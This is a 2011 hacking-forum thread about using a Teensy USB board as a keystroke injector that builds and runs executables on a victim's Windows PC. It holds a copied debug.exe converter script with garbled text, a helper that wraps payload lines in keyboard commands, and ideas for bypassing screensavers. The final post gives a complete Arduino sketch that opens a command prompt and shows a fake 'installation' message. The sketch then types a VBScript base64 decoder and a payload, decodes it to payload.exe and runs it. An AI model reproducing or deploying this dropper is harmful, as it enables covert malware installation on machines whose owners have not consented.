Sud0x3 Posted February 10, 2011 Share Posted February 10, 2011 (edited) I bought a teensy a few weeks back and here are some of my thoughts and ideas, im going to try not to ramble on. IDEA 1: Build an executable on the victim pc Here i basically wanted to try and find a way to create, make or build! an executable from instructions sent from the device. The only way of doing this that i could think of was using the windows debug trick. So using a module from http://sqlmap.sourceforge.net/ i converted an executable into a format that windows debug can read and convert this text file into an executable again. So i had the lines of code, i needed to get them onto the pc i decided id use the teensy to write each line from the file into a new notepad doc on the victims pc and then save and do the conversion on the file. dbgtool.py - Portabltest e executabltest e to ASCII debug script converterCopyright © 2006-2010 sqlmap developers source #!/usr/bin/env python """ $Id$ dbgtool.py - Portabltest e executabltest e to ASCII debug script converter Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/) Setest e thtest e filtest e 'doc/COPYING' for copying permission """ import os import sys import struct from optparstest e import OptionError from optparstest e import OptionParser def convert(inputFile): fileStat = os.stat(inputFile) fileSiztest e = fileStat.st_size if fileSiztest e > 65280: print "ERROR: thtest e provided input filtest e '%s' is too big for debug.exe" % inputFile sys.exit(1) script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_")) script += "%x\nf 0100 ffff 00\n" % fileSize scrString = "" counter = 256 counter2 = 0 fp = open(inputFile, "rb") fileContent = fp.read() for fileChar in fileContent: unsignedFileChar = struct.unpack("B", fileChar)[0] if unsignedFileChar != 0: counter2 += 1 if not scrString: scrString = "test e %0x %02x" % (counter, unsignedFileChar) else: scrString += " %02x" % unsignedFileChar elif scrString: script += "%s\n" % scrString scrString = "" counter2 = 0 counter += 1 if counter2 == 20: script += "%s\n" % scrString scrString = "" counter2 = 0 script += "w\nq\n" return script def main(inputFile, outputFile): if not os.path.isfile(inputFile): print "ERROR: thtest e provided input filtest e '%s' is not a regular file" % inputFile sys.exit(1) script = convert(inputFile) if outputFile: fpOut = open(outputFile, "w") sys.stdout = fpOut sys.stdout.write(script) sys.stdout.close() else: print script if __name__ == "__main__": usagtest e = "%s -i <input file> [-o <output file>]" % sys.argv[0] parser = OptionParser(usage=usage, version="0.1") try: parser.add_option("-i", dest="inputFile", help="Input binary file") parser.add_option("-o", dest="outputFile", help="Output debug.extest e text file") (args, _) = parser.parse_args() if not args.inputFile: parser.error("Missing thtest e input file, -h for help") except (OptionError, TypeError), e: parser.error(e) inputFiltest e = args.inputFile outputFiltest e = args.outputFile main(inputFile, outputFile) I tried using the Keyboard.print command, Keyboard.print("n WirelessKeyView_exe"); with help put together a script that would put the strings of a file and embed them between a Keyboard.print string. #!/usr/bin/python for line in open('debug.txt', 'r').readlines(): open('output.txt', 'a').write('Keyboard.print("' + line.replace('\n', '') + '");\n') r cx bc00 f 0100 ffff 00 e 100 4d 5a 90 e 104 03 e 108 04 e 10c ff ff e 110 b8 e 118 40 e 13c e0 e 140 0e 1f ba 0e e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 e 16d 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 e 180 12 f2 d9 dc 56 93 b7 8f 56 93 b7 8f 56 93 b7 8f ac b0 f7 8f Keyboard.print("r cx"); Keyboard.print("bc00"); Keyboard.print("f 0100 ffff 00"); Keyboard.print("e 100 4d 5a 90"); Keyboard.print("e 104 03"); Keyboard.print("e 108 04"); Keyboard.print("e 10c ff ff"); Keyboard.print("e 110 b8"); Keyboard.print("e 118 40"); Keyboard.print("e 13c e0"); Keyboard.print("e 140 0e 1f ba 0e"); Keyboard.print("e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61"); Keyboard.print("e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44"); after getting this far i tried to compile the project and it seems to be too many lines of code for the teensy to handle on the software, il be honest i dont have a clue. here is the error i got in compiling elf section .data is not within region dataelf section .bss will not fit in region data elf section .data is not within region data ./desktop/arduino-0018/hardware/tools/avr/bin/../lib/gcc/avr/4.3.2/../../../../avr/bin/ld.exe: region data overflowed by 43740 bytes IDEA 2: Some ideas for scripts Off my head not all may be viable or sane! + enter bios, run through key combinations to put the PC into the bios configurstion + Bypass Screensaver, again run through key combinations to bypass the screensaver + enumeration, script to do enumeration through the command line using only the pcs programs. teensy would generate a batch file though the same methods discussed above when i converted a file to a readable format for the teensy to use. + Payload switcher on an lcd screen + more to come... Edited February 10, 2011 by Sud0x3 Quote Link to comment Share on other sites More sharing options...
illwill Posted February 13, 2011 Share Posted February 13, 2011 I've been doing the same thing http://www.toolcrypt.org/tools/dbgtool/index.html using this instead of the python script ive been running into the same kind of issues, the code compiles ok but i dont htink the teensy's memmory can handle that much text at ones, trying to figure out a loop for it to take chunks of the debug script at a time Quote Link to comment Share on other sites More sharing options...
DaberMania Posted April 8, 2011 Share Posted April 8, 2011 I think I might have found the solution to help with getting an executable on the box using Teensy and nothing but the HID drivers of the OS. When I was researching around I found a VBScript for server side conversion of a file to base64. I then changed it around a bit and have adapted it to my Teensy. Right now, I have posed a tutorial on how to convert any file to ASCII Base64 encoded text then decode it using nothing but VBScripts. I am currently in the process of writing the tutorial on adapting this logic to the Teensy. But to get you started, here is the tutorial on how to convert any file to ASCII base64 encoding: http://dabermania.blogspot.com/2011/03/converting-any-file-to-ascii-for.html Quote Link to comment Share on other sites More sharing options...
marked Posted May 26, 2011 Share Posted May 26, 2011 Hi all, I was working on the same topic, so I can share my Poc. I used the same encoding technique that you are talking about (base64 in vbs) and writing the payload and the vbs on the victim machine. Here is the code, works fine for me with an asm downloader of 1Ko (env. 3 sec. to execute the loop): #include <phukdlib.h> #include <avr/pgmspace.h> // // binary copy download and execute payload // // 25.05.2011 char vbsString[] = "echo Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject(\"Scripting.FileSystemObject\"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject(\"Microsoft.XMLDOM\"):Set EL = DM.createElement(\"tmp\"):EL.DataType = \"bin.base64\":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject(\"ADODB.Stream\"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub > script.vbs & cls" ; #include <avr/pgmspace.h> // put the encoded exe payload here prog_char string_0[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > pl.dat & cls"; prog_char string_1[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_2[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_3[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_4[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_5[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_6[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5m >> pl.dat & cls"; prog_char string_7[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_8[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_9[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_10[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_11[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_12[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_13[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_14[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_15[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_16[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_17[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_18[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_19[] PROGMEM = "echo AA== >> pl.dat"; // Then set up a table to refer to your strings. PROGMEM const char *string_table[] = { string_0, string_1, string_2, string_3, string_4, string_5, string_6, string_7, string_8, string_9, string_10, string_11, string_12, string_13, string_14, string_15, string_16, string_17, string_18, string_19}; char buffer[100]; void setup() { delay(20000); pinMode(11, OUTPUT); digitalWrite(11, HIGH); delay(50); sendWinKey () ; delay(500); Keyboard.println("cmd"); //"cmd /t:ab" //delay(500); //ShrinkCurWinMSWIN(); delay(500); Keyboard.print("msg "); sendAsterixKey (); Keyboard.println(Installation in progress... - Please Wait "); delay(50); sendVbs(); } void loop() { } void sendVbs () { Keyboard.println(vbsString); for (int i = 0; i < 20; i++) { strcpy_P(buffer, (char*)pgm_read_word(&(string_table[i]))); Keyboard.println(buffer); delay(50); } Keyboard.println("cscript script.vbs pl.dat payload.exe & cls"); Keyboard.println("payload.exe & cls"); // run payload Keyboard.println("exit"); // run payload } void sendPlusKey () { Keyboard.set_key1(KEYPAD_PLUS); Keyboard.send_now(); Keyboard.set_key1(0); // reset key state Keyboard.send_now(); } void sendAsterixKey () { Keyboard.set_key1(KEYPAD_ASTERIX); Keyboard.send_now(); Keyboard.set_key1(0); // reset key state Keyboard.send_now(); } void sendWinKey () { Keyboard.set_modifier(128); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } Any ideas are welcome. Cheers. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.